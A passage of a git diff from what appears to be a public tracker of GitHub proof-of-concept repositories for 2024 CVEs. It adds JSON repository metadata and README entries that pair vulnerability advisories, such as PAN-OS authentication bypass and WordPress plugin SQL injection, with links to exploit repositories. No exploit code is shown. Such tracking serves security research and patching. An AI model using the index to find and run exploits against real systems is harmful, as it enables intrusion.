"https:\/\/avatars.githubusercontent.com\/u\/121257754?v=4", + "html_url": "https:\/\/github.com\/mustafaakalin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mustafaakalin\/CVE-2024-9465", + "description": "Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)", + "fork": false, + "created_at": "2024-10-10T08:23:31Z", + "updated_at": "2024-10-10T08:39:26Z", + "pushed_at": "2024-10-10T08:39:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9466.json b/2024/CVE-2024-9466.json new file mode 100644 index 0000000000..005a4ef29e --- /dev/null +++ b/2024/CVE-2024-9466.json @@ -0,0 +1,33 @@ +[ + { + "id": 875151386, + "name": "CVE-2024-9466", + "full_name": "holypryx\/CVE-2024-9466", + "owner": { + "login": "holypryx", + "id": 182792867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182792867?v=4", + "html_url": "https:\/\/github.com\/holypryx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/holypryx\/CVE-2024-9466", + "description": "CVE-2024-9466 poc", + "fork": false, + "created_at": "2024-10-19T08:22:13Z", + "updated_at": "2024-10-22T02:01:29Z", + "pushed_at": "2024-10-19T08:25:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9474.json b/2024/CVE-2024-9474.json new file mode 100644 index 0000000000..fee8364bbc --- /dev/null +++ b/2024/CVE-2024-9474.json @@ -0,0 +1,95 @@ +[ + { + "id": 891077206, + "name": "CVE-2024-9474", + "full_name": "Chocapikk\/CVE-2024-9474", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-9474", + "description": "PAN-OS auth bypass + RCE", + "fork": false, + "created_at": "2024-11-19T17:26:27Z", + "updated_at": "2024-11-28T09:18:35Z", + "pushed_at": "2024-11-19T17:38:29Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891185979, + "name": "CVE-2024-9474", + "full_name": "k4nfr3\/CVE-2024-9474", + "owner": { + "login": "k4nfr3", + "id": 45294916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45294916?v=4", + "html_url": "https:\/\/github.com\/k4nfr3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k4nfr3\/CVE-2024-9474", + "description": null, + "fork": false, + "created_at": "2024-11-19T22:03:13Z", + "updated_at": "2024-11-25T12:55:20Z", + "pushed_at": "2024-11-22T16:39:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891754275, + "name": "CVE-2024-9474", + "full_name": "deathvu\/CVE-2024-9474", + "owner": { + "login": "deathvu", + "id": 47398055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47398055?v=4", + "html_url": "https:\/\/github.com\/deathvu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deathvu\/CVE-2024-9474", + "description": "PoC for PAN-OS Exploit", + "fork": false, + "created_at": "2024-11-20T22:31:50Z", + "updated_at": "2024-11-20T22:35:13Z", + "pushed_at": "2024-11-20T22:35:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9570.json b/2024/CVE-2024-9570.json new file mode 100644 index 0000000000..68d62aa315 --- /dev/null +++ b/2024/CVE-2024-9570.json @@ -0,0 +1,33 @@ +[ + { + "id": 871275663, + "name": "CVE-2024-9570_D-Link-DIR-619L-bof", + "full_name": "dylvie\/CVE-2024-9570_D-Link-DIR-619L-bof", + "owner": { + "login": "dylvie", + "id": 78607002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78607002?v=4", + "html_url": "https:\/\/github.com\/dylvie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dylvie\/CVE-2024-9570_D-Link-DIR-619L-bof", + "description": "Exploit for CVE-2024-9570", + "fork": false, + "created_at": "2024-10-11T16:05:06Z", + "updated_at": "2024-10-14T02:39:01Z", + "pushed_at": "2024-10-11T16:08:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9593.json b/2024/CVE-2024-9593.json new file mode 100644 index 0000000000..c8deafb3bd --- /dev/null +++ b/2024/CVE-2024-9593.json @@ -0,0 +1,64 @@ +[ + { + "id": 874679920, + "name": "CVE-2024-9593", + "full_name": "RandomRobbieBF\/CVE-2024-9593", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9593", + "description": "Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Unauthenticated (Limited) Remote Code Execution", + "fork": false, + "created_at": "2024-10-18T09:11:03Z", + "updated_at": "2024-10-18T17:57:05Z", + "pushed_at": "2024-10-18T09:14:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890236164, + "name": "CVE-2024-9593-EXP", + "full_name": "0x4f5da2-venom\/CVE-2024-9593-EXP", + "owner": { + "login": "0x4f5da2-venom", + "id": 130073287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130073287?v=4", + "html_url": "https:\/\/github.com\/0x4f5da2-venom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4f5da2-venom\/CVE-2024-9593-EXP", + "description": "CVE-2024-9593 WordPress插件的远程代码执行", + "fork": false, + "created_at": "2024-11-18T08:22:44Z", + "updated_at": "2024-11-18T08:46:15Z", + "pushed_at": "2024-11-18T08:46:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9680.json b/2024/CVE-2024-9680.json new file mode 100644 index 0000000000..43f0748c8c --- /dev/null +++ b/2024/CVE-2024-9680.json @@ -0,0 +1,33 @@ +[ + { + "id": 874322010, + "name": "Firefox-CVE-2024-9680", + "full_name": "tdonaworth\/Firefox-CVE-2024-9680", + "owner": { + "login": "tdonaworth", + "id": 56687505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56687505?v=4", + "html_url": "https:\/\/github.com\/tdonaworth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdonaworth\/Firefox-CVE-2024-9680", + "description": null, + "fork": false, + "created_at": "2024-10-17T16:10:38Z", + "updated_at": "2024-11-28T05:39:24Z", + "pushed_at": "2024-10-17T16:28:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9707.json b/2024/CVE-2024-9707.json new file mode 100644 index 0000000000..668860f150 --- /dev/null +++ b/2024/CVE-2024-9707.json @@ -0,0 +1,33 @@ +[ + { + "id": 871033172, + "name": "CVE-2024-9707", + "full_name": "RandomRobbieBF\/CVE-2024-9707", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9707", + "description": "Hunk Companion <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-10-11T06:21:38Z", + "updated_at": "2024-10-18T17:57:25Z", + "pushed_at": "2024-10-11T06:25:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9796.json b/2024/CVE-2024-9796.json new file mode 100644 index 0000000000..70b495bb5e --- /dev/null +++ b/2024/CVE-2024-9796.json @@ -0,0 +1,64 @@ +[ + { + "id": 874826793, + "name": "CVE-2024-9796", + "full_name": "RandomRobbieBF\/CVE-2024-9796", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9796", + "description": "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-18T14:30:42Z", + "updated_at": "2024-10-19T01:05:17Z", + "pushed_at": "2024-10-18T14:39:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889251660, + "name": "CVE-2024-9796", + "full_name": "issamjr\/CVE-2024-9796", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2024-9796", + "description": "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-15T22:55:18Z", + "updated_at": "2024-11-26T14:47:16Z", + "pushed_at": "2024-11-15T23:04:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9821.json b/2024/CVE-2024-9821.json new file mode 100644 index 0000000000..6f058f6f77 --- /dev/null +++ b/2024/CVE-2024-9821.json @@ -0,0 +1,33 @@ +[ + { + "id": 871263157, + "name": "CVE-2024-9821", + "full_name": "RandomRobbieBF\/CVE-2024-9821", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9821", + "description": "Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass", + "fork": false, + "created_at": "2024-10-11T15:35:39Z", + "updated_at": "2024-10-18T17:57:16Z", + "pushed_at": "2024-10-11T15:47:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9890.json b/2024/CVE-2024-9890.json new file mode 100644 index 0000000000..a14be5647d --- /dev/null +++ b/2024/CVE-2024-9890.json @@ -0,0 +1,33 @@ +[ + { + "id": 885365895, + "name": "CVE-2024-9890", + "full_name": "RandomRobbieBF\/CVE-2024-9890", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9890", + "description": "User Toolkit <= 1.2.3 - Authenticated (Subscriber+) Authentication Bypass", + "fork": false, + "created_at": "2024-11-08T12:56:55Z", + "updated_at": "2024-11-08T12:59:44Z", + "pushed_at": "2024-11-08T12:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9926.json b/2024/CVE-2024-9926.json new file mode 100644 index 0000000000..d1c219ba38 --- /dev/null +++ b/2024/CVE-2024-9926.json @@ -0,0 +1,79 @@ +[ + { + "id": 877508313, + "name": "wordpress-jetpack-broken-access-control-vulnerable-application", + "full_name": "m3ssap0\/wordpress-jetpack-broken-access-control-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-jetpack-broken-access-control-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Jetpack < 13.9.1 broken access control (CVE-2024-9926). Run it at your own risk!", + "fork": false, + "created_at": "2024-10-23T19:12:55Z", + "updated_at": "2024-11-25T03:27:38Z", + "pushed_at": "2024-11-09T11:13:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "cve-2024-9926", + "jetpack", + "vulnerable-application", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881924384, + "name": "wordpress-jetpack-broken-access-control-exploit", + "full_name": "m3ssap0\/wordpress-jetpack-broken-access-control-exploit", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-jetpack-broken-access-control-exploit", + "description": "Exploits Jetpack < 13.9.1 broken access control (CVE-2024-9926).", + "fork": false, + "created_at": "2024-11-01T14:03:55Z", + "updated_at": "2024-11-27T13:31:35Z", + "pushed_at": "2024-11-09T11:19:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9926", + "exploit", + "jetpack", + "security", + "security-tools", + "vulnerability", + "vulnerability-scan", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9932.json b/2024/CVE-2024-9932.json new file mode 100644 index 0000000000..529d989f25 --- /dev/null +++ b/2024/CVE-2024-9932.json @@ -0,0 +1,33 @@ +[ + { + "id": 883779888, + "name": "CVE-2024-9932", + "full_name": "RandomRobbieBF\/CVE-2024-9932", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9932", + "description": "Wux Blog Editor <= 3.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-05T15:00:39Z", + "updated_at": "2024-11-19T06:00:58Z", + "pushed_at": "2024-11-05T15:02:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9933.json b/2024/CVE-2024-9933.json new file mode 100644 index 0000000000..fd2ffa44c6 --- /dev/null +++ b/2024/CVE-2024-9933.json @@ -0,0 +1,33 @@ +[ + { + "id": 883936829, + "name": "CVE-2024-9933", + "full_name": "RandomRobbieBF\/CVE-2024-9933", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9933", + "description": "WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check", + "fork": false, + "created_at": "2024-11-05T20:55:09Z", + "updated_at": "2024-11-05T20:58:15Z", + "pushed_at": "2024-11-05T20:58:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9935.json b/2024/CVE-2024-9935.json new file mode 100644 index 0000000000..22d8cd599b --- /dev/null +++ b/2024/CVE-2024-9935.json @@ -0,0 +1,33 @@ +[ + { + "id": 890288552, + "name": "CVE-2024-9935", + "full_name": "RandomRobbieBF\/CVE-2024-9935", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9935", + "description": "PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download", + "fork": false, + "created_at": "2024-11-18T10:14:45Z", + "updated_at": "2024-11-19T09:28:54Z", + "pushed_at": "2024-11-18T10:15:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9955.json b/2024/CVE-2024-9955.json new file mode 100644 index 0000000000..77742d1517 --- /dev/null +++ b/2024/CVE-2024-9955.json @@ -0,0 +1,33 @@ +[ + { + "id": 881563522, + "name": "CVE-2024-9955-POC", + "full_name": "amfg145\/CVE-2024-9955-POC", + "owner": { + "login": "amfg145", + "id": 16266637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16266637?v=4", + "html_url": "https:\/\/github.com\/amfg145", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amfg145\/CVE-2024-9955-POC", + "description": "Fortinet Privilege Escalation Advisory CVE-2024-9955-POC: Elevation to Domain Admin on FortiOS and FortiProxy", + "fork": false, + "created_at": "2024-10-31T20:23:15Z", + "updated_at": "2024-11-06T15:37:39Z", + "pushed_at": "2024-10-31T20:35:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/README.md b/README.md index 7973b15fd3..8c8efc2f7b 100644 --- a/README.md +++ b/README.md @@ -1,20 +1,44300 @@ # PoC in GitHub ## 2024 +### CVE-2024-0012 (2024-11-18) + +An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .\n\nThe risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .\n\nThis issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software.\n\nCloud NGFW and Prisma Access are not impacted by this vulnerability. + + +- [watchtowrlabs/palo-alto-panos-cve-2024-0012](https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012) +- [Sachinart/CVE-2024-0012-POC](https://github.com/Sachinart/CVE-2024-0012-POC) +- [greaselovely/CVE-2024-0012](https://github.com/greaselovely/CVE-2024-0012) +- [VegetableLasagne/CVE-2024-0012](https://github.com/VegetableLasagne/CVE-2024-0012) +- [iSee857/CVE-2024-0012-poc](https://github.com/iSee857/CVE-2024-0012-poc) +- [XiaomingX/cve-2024-0012-poc](https://github.com/XiaomingX/cve-2024-0012-poc) +- [PunitTailor55/Paloalto-CVE-2024-0012](https://github.com/PunitTailor55/Paloalto-CVE-2024-0012) + +### CVE-2024-0015 (2024-02-16) + +In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. + + +- [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015) + +### CVE-2024-0023 (2024-02-16) + +In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [AbrarKhan/G3_Frameworks_av_CVE-2024-0023](https://github.com/AbrarKhan/G3_Frameworks_av_CVE-2024-0023) +- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0023](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0023) + +### CVE-2024-0030 (2024-02-16) + +In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/system_bt_CVE-2024-0030](https://github.com/uthrasri/system_bt_CVE-2024-0030) + +### CVE-2024-0039 (2024-03-11) + +In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit) + +### CVE-2024-0040 (2024-02-16) + +In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040) +- [uthrasri/frameworks_av_CVE-2024-0040](https://github.com/uthrasri/frameworks_av_CVE-2024-0040) + +### CVE-2024-0044 (2024-03-11) + +In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter) +- [pl4int3xt/CVE-2024-0044](https://github.com/pl4int3xt/CVE-2024-0044) +- [Re13orn/CVE-2024-0044-EXP](https://github.com/Re13orn/CVE-2024-0044-EXP) +- [007CRIPTOGRAFIA/c-CVE-2024-0044](https://github.com/007CRIPTOGRAFIA/c-CVE-2024-0044) +- [Kai2er/CVE-2024-0044-EXP](https://github.com/Kai2er/CVE-2024-0044-EXP) +- [hunter24x24/cve_2024_0044](https://github.com/hunter24x24/cve_2024_0044) +- [nexussecelite/EvilDroid](https://github.com/nexussecelite/EvilDroid) +- [nahid0x1/CVE-2024-0044](https://github.com/nahid0x1/CVE-2024-0044) +- [MrW0l05zyn/cve-2024-0044](https://github.com/MrW0l05zyn/cve-2024-0044) +- [canyie/CVE-2024-0044](https://github.com/canyie/CVE-2024-0044) + +### CVE-2024-0049 (2024-03-11) + +In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049) +- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0049](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0049) + +### CVE-2024-0195 (2024-01-02) + +Es wurde eine Schwachstelle in spider-flow 0.4.3 gefunden. Sie wurde als kritisch eingestuft. Es betrifft die Funktion FunctionService.saveFunction der Datei src/main/java/org/spiderflow/controller/FunctionController.java. Durch Manipulieren mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195) +- [gh-ost00/CVE-2024-0195-SpiderFlow](https://github.com/gh-ost00/CVE-2024-0195-SpiderFlow) +- [MuhammadWaseem29/CVE-2024-0195-SpiderFlow](https://github.com/MuhammadWaseem29/CVE-2024-0195-SpiderFlow) +- [hack-with-rohit/CVE-2024-0195-SpiderFlow](https://github.com/hack-with-rohit/CVE-2024-0195-SpiderFlow) + +### CVE-2024-0197 (2024-02-27) + +A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.\n\n + + +- [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC) + +### CVE-2024-0204 (2024-01-22) + +Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. + + +- [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204) +- [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204) +- [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204) +- [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204) + +### CVE-2024-0230 (2024-01-12) + +A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic. + + +- [keldnorman/cve-2024-0230-blue](https://github.com/keldnorman/cve-2024-0230-blue) + +### CVE-2024-0235 (2024-01-16) + +The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog + + +- [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235) + +### CVE-2024-0305 (2024-01-08) + +Eine Schwachstelle wurde in Guangzhou Yingke Electronic Technology Ncast bis 2017 gefunden. Sie wurde als problematisch eingestuft. Dies betrifft einen unbekannten Teil der Datei /manage/IPSetup.php der Komponente Guest Login. Durch das Manipulieren mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp) + +### CVE-2024-0311 (2024-03-14) + +A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code. + + +- [calligraf0/CVE-2024-0311](https://github.com/calligraf0/CVE-2024-0311) + +### CVE-2024-0324 (2024-02-05) + +The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles. + + +- [kodaichodai/CVE-2024-0324](https://github.com/kodaichodai/CVE-2024-0324) + +### CVE-2024-0352 (2024-01-09) + +In Likeshop bis 2.5.7.20210311 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die 